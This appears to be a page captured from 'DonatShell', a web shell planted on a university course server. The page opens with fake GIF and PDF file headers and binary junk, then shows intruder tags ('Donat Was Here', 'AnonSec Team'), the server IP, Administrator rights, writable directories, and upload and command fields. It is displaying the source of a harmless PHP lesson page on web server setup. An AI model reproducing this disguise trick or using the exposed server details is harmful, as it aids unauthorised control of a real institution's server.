GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/MichaelMalz/CST2608/_Archive/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/MichaelMalz/CST2608/_Archive/Lesson08.php
<?
// Lesson08.php

$TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n";
ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path.
include('application.phpinc');
include('Course/courseInfo.phpinc');
include('classInfo.phpinc');

$assignmentNumber = 8;
$assignmentType = "Lesson";
$assignmentTitle = "Web server setup";
$evaluationType = "Lab";
$evaluationTitle = $assignmentTitle;
if (strlen($assignmentNumber) == 1) { $assignmentName = $assignmentType."0".$assignmentNumber; $evaluationName = $evaluationType."0".$assignmentNumber; } else { 
$assignmentName = $assignmentType.$assignmentNumber; $evaluationName = $evaluationType.$assignmentNumber; }
if ($evaluationTitle != '') $evaluationTitle = ' - '.$evaluationTitle;

$title = $assignmentType." ".$assignmentNumber.": ".$assignmentTitle;
$headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title;
$pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title;
$pageMenu = 'Course/courseMenu.phpinc';
$smallTitle = true;
$js='openCenteredWindow';
include('common/pageHeader.phpinc');
$sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title;
include('common/sectionHeader.phpinc');
?>
<p>
<fieldset><legend>Description</legend>
Setup a Web server and SquirrelMail web  based email.
</fieldset>

<fieldset class="pio"><legend>Lesson Instruction</legend>
<ol start="1" class="pio">
  <li>Read Chapter 21 <i>Web Hosting and Internet Servers</i> in <?=$textbook['Title1']?><?=$textbook['Edition1Edition']?>.</li>
<?
if ($evaluationType != '') {
?>
	<li>Complete and submit <a href="<?=$evaluationName?>.php"><?=$evaluationType?> <?=$assignmentNumber?><?=$evaluationTitle?></a> for evaluation.</li>
<?
}
?>
</ol>
</fieldset>

<fieldset class="pio"><legend>Objectives</legend>
<ol class="obj pio" start="22">
	<!-- Week 11 22 Chapter 21 -->
	<li>Describe web hosting.</li>
	<li>Install and configure web hosting services such as Web Server, SSL, and database.</li>
	<li>Use web services.</li>
</ol>
</fieldset>

<fieldset><legend>Evaluations</legend>
<?
if ($evaluationType != '') {
?>
	Complete and submit <a href="<?=$evaluationName?>.php"><?=$evaluationType?> <?=$assignmentNumber?><?=$evaluationTitle?></a> for evaluation.
<?
} else {
?>
	There are no formal evaluations for this <?=$assignmentType?>.
<?
}
?>
</fieldset>

<fieldset><legend>Description</legend>
Begin an understanding of what makes up a network.
</fieldset>

<?
include('ReferencesResources.phpinc');
include('common/sectionFooter.phpinc');
include('common/pageFooter.phpinc');

?>

Anon7 - 2022
AnonSec Team